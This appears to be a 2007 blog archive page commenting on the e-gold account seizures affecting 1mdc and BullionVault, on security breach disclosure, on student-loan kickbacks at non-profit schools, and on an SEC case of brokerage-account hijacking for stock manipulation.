    Swiss ownership suggests an independence from some of the pressures which Brinks may have found themselves operating under recently. Also you - our users - have chosen to vault 26 times as much gold in Switzerland as in the United States, so we believe this change will be both natural and welcome.

    This is an echo of the old e-gold story, where different reputable vault companies handed the e-gold reserves around like it was musical chairs. BuillionVault is a new generation gold system, not encouraging payments but instead encouraging holding, buying and selling. It's not yet clear why they would be a threat.

    But then, from 1mdc, a payment system:

    ATTENTION

    Friday Apr 27 2007 - 4AM UTC

    It appears that a U.S. Government court order has forced e-gold(R) to close down or confiscate all of 1mdc's accounts. All of 1mdc account's have been closed at e-gold by order of the US Government.

    Please note that it appears the accounts of a number of the largest exchangers and largest users of e-gold have also been closed or confiscated overnight: millions of Euros of gold have been held in this event. A couple of large exchanger's accounts have been shutdown.

    If the confiscation or court order in the USA is reversed, your e-gold grams remaining in 1mdc will "unbail" normally to your e-gold account.

    We suggest not panicking: more will be known on Monday when there will be more activity in the courts.

    You CAN spend your 1mdc back and fore to other 1mdc accounts. 1mdc is operating normally within 1mdc. However you should be aware there is the possibility your e-gold will never be released from e-gold due to the court order.

    Ultimately e-gold(R) is an entirely USA-based company, owned and operated by US citizens, so, as e-gold users we must respect the decisions of US courts and the US authorities regarding the disposition of e-gold. Even though 1mdc has no connection whstsoever to the USA, and most 1mdc users are non-USA, e-gold(R) is USA based.

    You are welcome to email "team@1mdc.com", thank you.

    Yowsa! That's heavy. And now, BullionVault's actions make perfect sense. Brinks probably heard rumour of happenings, and BullionVault are probably sweating off those pounds right now crossing the border with rucksacks of kg of yellow ballast.

    It's worth while looking at how 1mdc worked, so as to understand what all the above means. 1mdc is simply a pure-play e-gold derivative system, in that 1mdc maintained one (or some) e-gold accounts for the reserve value, and then offered an accounting system in grams for spending back and forth.

    1mdc then stands out as not actually managing and reserving in gold. Instead it manages e-gold ... which manages and reserves in gold. Now, contractually, this would be quite messy, excepting that the website has fairly generally made no bones of this: 1mdc is just e-gold, handled better.

    So, above, 1mdc is totally uneffected! Except all the users who held e-gold there (in 1mdc) are now totally stuffed! Well, we'll see in time what the real story is, but when this sort of thing happens, there are generally some losers.

    What then was the point of 1mdc? e-gold were too stuffy in many ways. One was that they charged a lot, another was the owners of e-gold were pretty aggressive characters, and they scared a lot of their customers away. Other problems existed which resulted in a steady supply of customers over to 1mdc, who famously never charged fees.

    We could speculate that 1mdc was destined for sale at some stage. And I stress, I don't actually know what the point was. In contrast to the e-gold story, 1mdc ran a fairly tight ship, printed all of their news in the open, and didn't share the strategy beyond that.

    It may appear then that the US has moved to close down competition. Other than pique at not being able to see the account holders, this appeared yesterday to be a little mysterious and self-damaging. Today's news however clarifies, which I'll try and write a bit more about in another entry:

    ...the Department of Justice also obtained a restraining order on the defendants to prevent the dissipation of assets by the defendants, and 24 seizure warrants on over 58 accounts believed to be property involved in money laundering and operation of an unlicensed money transmitting business.
    Posted by iang at 11:15 AM | Comments (5) | TrackBack

    April 17, 2007

    Our security sucks. Why can't we change? What's wrong with us?

    Adam over at EC joined the fight against the disaster known as Internet Security and decided Choicepoint was his wagon. Mine was phishing, before it got boring.

    What is interesting is that Adam has now taken on the meta-question of why we didn't do a better job. Readers here will sympathise. Read his essay about how the need for change is painful, both directly and broadly:

    At a human level, change involves loss and and the new. When we lose something, we go through a process, which often includes of shock, anger, denial, bargaining and acceptance. The new often involves questions of trying to understand the new, understanding how we fit into it, if our skills and habits will adapt well or poorly, and if we will profit or lose from it.

    Adam closes with a plea for help on disclosure :

    I'm trying to draw out all of the reasons why people are opposed to change in disclosure habits, so we can overcome them.

    I am not exactly opposed but curious, as I see the issues differently. So in a sense, deferring for a moment a brief comment on the essay, here are a few comments on disclosure.

    1. Disclosure is something that is very hard to isolate. SB1386 was a big win, but it only covered the easy territory: you, bad company, know the victim's name, so tell them.
    2. Disclosure today doesn't cover what we might call secondary disclosure, which is what Adam is looking for. As discussed Schechter and Smith, and in my Market for Silver Bullets:

      Schechter & Smith use an approach of modelling risks and rewards from the attacker's point of view which further supports the utility of sharing information by victims:

      Sharing of information is also key to keeping marginal risk high. If the body of knowledge of each member of the defense grows with the number of targets attacked, so will the marginal risk of attack. If organizations do not share information, the body of knowledge of each one will be constant and will not affect marginal risk. Stuart E. Schechter and Michael D. Smith "How Much Security is Enough to Stop a Thief?", Financial Cryptography 2003 LNCS Springer-Verlag.

      Yet, to share raises costs for the sharer, and the benefits are not accrued to the sharer. This is a prisoner's dilemma for security, in that there may well be a higher payoff if all victims share their experiences, yet those that keep mum will benefit and not lose more from sharing. As all potential sharers are joined in an equilibrium of secrecy, little sharing of security information is seen, and this is rational. We return to this equilibrium later.

    3. Disclosure implies the company knows what happens. What if they don't?
    4. Disclosure assumes that the company will honestly report the full story. History says they won't.
    5. Disclosure of the full story is only ... part of the story. "We lost a laptop." So what? "Don't do that again..." is hardly a satisfactory, holistic or systemic response to the situation.

      (OK, so some explanation. At what point do we forget the nonsense touted in the press and move on to a real solution where the lost data doesn't mean a compromise? IOW, "we were given the task of securing all retail transactions......")

    So, while I think that there is a lot to be said about disclosure, I think it is also a limited story. I personally prefer some critical thought -- if I can propose half a dozen solutions to some poor schmuck company's problems, why can't they?

    And it is to that issue that Adam's essay really speaks. Why can't we change? What's wrong with us?

    Posted by iang at 03:42 PM | Comments (5) | TrackBack

    April 09, 2007

    Does non-profit mean non-governance? Evidence from the fat, rich and naive business sector

    I've previously blogged on how the non-profit sector is happy hunting grounds for scams, fraud, incentives deals and all sorts of horrible deals. This caused outrage by those who believe that non-profits are somehow protected by their basic and honest goodness. Actually, they are fat, happy and ripe for fraud.

    The basic conditions are these:

    • lots of money
    • lots of people from "I want to do good" background
    • little of the normal governance is necessary

    Examples abound, if you know how to look. Coming from a background of reading the scams and frauds that rip apart the commercial sector, seeing it in the non-profit sector is easy, because of the super-fertile conditions mentioned above.

    Here's one. In New York state in the US of A, the schools have been found taking incentives to prefer one lender over another for student loans.

    [State Attorney-General] Cuomo has sent letters to and requested documents from more than a hundred schools for information about any financial incentives the schools or their administrators may have derived from doing business with certain lenders, such a gifts, junkets, and awards of stock.

    A common practice exposed by Cuomo is a revenue-sharing agreement, whereby a lender pays back a school a fixed percentage of the net value loans steered its way. Lenders particularly benefit when schools place them on a short list of “preferred” lenders, since 3,200 firms nationwide are competing for market share in the $85 billion a year business.

    Here's an inside tip that I picked up on my close observance of the mutual funds scandal, also brought by then NY-AG Elliot Spitzer (now Governor, an easy pick as he brought in $1.5bn in fines). If the Attorney-General writes those letters, he already has the evidence. So we can assume, for the working purposes of a learning exercise, that this is in fact what is happening.

    There's lots of money ($85Bn). The money comes from somewhere. It can be used in small incentives to steer the major part in certain directions.

    To narrow the options, most schools publish lists of preferred lenders for both government and private loans. They typically feature half a dozen lenders, but they might have only one. Students should always ask if the school is getting any type of payment or service from lenders on the list.

    To get a loan, schools must certify that you are qualified. By law, schools can't refuse to certify a loan, nor can they cause "unreasonable delays," because you choose a nonpreferred lender. That said, many schools strongly discourage students from choosing a nonpreferred lender.

    ...

    The University of North Carolina at Chapel Hill tells students on a form that if they choose a lender other than the school's sole preferred lender for Stafford loans, "there will be a six-week delay in the processing of your loan application" because it must be processed manually.

    How do we address this? If we are a non-profit, then we can do these things:

    • pick a very solid mission.
    • build an environment that supports that mission, down to the cellular level.
    • create an open disclosure policy which allows others to help us pick up drift.
    • especially, create a solid framework for all "deals."
    • put together a team that knows governance.

    It's not so exceptional. Some schools got it:

    Thirty-one other schools joined Penn and NYU in adopting a code of conduct that prohibits revenue-sharing with lenders, requires schools to disclose why they chose preferred lenders, and bans financial aid officers and other school officials from receiving more than nominal gifts from lenders.

    Clues in bold. How many has your big fat, rich open source non-profit got? I know one that has all of the first list, and has none of the second.

    Posted by iang at 07:19 AM | Comments (3) | TrackBack

    March 17, 2007

    An ordinary crime: stock manipulation

    Sometimes when we can't seem to get anywhere on analysing our own sector of criminal activity, it helps to look at some ordinary stuff. Here's one:

    According to the Commission's complaint, between July and November 2006, the Defendants repeatedly hijacked the online brokerage accounts of unwitting investors using stolen usernames and passwords. Prior to intruding into these accounts, the Defendants acquired positions in the securities of at least fourteen securities, including Sun Microsystems, Inc., and "out of the money" put options on shares of Google, Inc. Then, without the accountholders' knowledge, and using the victims' own accounts and funds, the Defendants placed scores of unauthorized buy orders at above-market prices. After these unauthorized buy orders were placed, the Defendants sold the positions held in their own accounts at the artificially inflated prices, realizing profits of over $121,500.

    To achieve this benefit, the prosecution alleges that $875,000 of damage was done.

    It's a point worth underscoring: a criminal attack in our world often involves doing much more damage than the gain to the criminal. For that reason, we must focus on the overall result and not on the headline number. Here's a more aggressive damages number:

    The pump and dump scheme, which occured between July and November 2006, has cost one brokerage firm at least $2m in losses. An estimated 60 customers and nine US brokerage firms were identified as victims.

    Also, funds seized.

    Posted by iang at 08:05 AM | Comments (0) | TrackBack